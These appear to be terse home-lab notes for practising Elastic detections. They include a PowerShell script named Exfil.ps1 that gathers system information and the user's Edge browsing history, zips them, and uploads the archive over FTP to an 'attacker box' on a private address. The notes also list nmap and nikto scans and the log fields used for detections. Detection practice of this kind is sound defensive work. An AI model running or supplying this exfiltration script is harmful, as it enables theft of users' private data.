Exfil script
Attacker Box
Start-Sleep -Seconds 5
Exfil.ps1 systeminfo > C:\Windows\Temp\Exfil\sysinfo.txt $browsing_history_file_path = "C:\Users\" + $Env:UserName + "\AppData\Local\Microsoft\Edge\User Data\Default\History" cp $browsing_history_file_path C:\Windows\Temp\Exfil Compress-Archive -LiteralPath C:\Windows\Temp\Exfil -DestinationPath C:\Windows\Temp\Exfil.zip $client = New-Object System.Net.WebClient $client.Credentials = New-Object System.Net.NetworkCredential("parrot", "parrot") $client.UploadFile("ftp://192.168.80.8/Exfil.zip","C:\\\\Windows\\\\Temp\\\\Exfil.zip")
3 ATTACK Scenarios
Test: sudo nmap -sV -p 8000 192.168.80.4 ← Elastic discovered this activity
sudo nikto -h 192.168.80.4
Port scanning a web server built using python.
Extra: Spin up a SQL DB server , FTP, SMTP mail server execute scans against those disparate servers or even an AD server. Create detections from logs.
user_agent.orginal
url.path
source.ip
event.action
destination.ip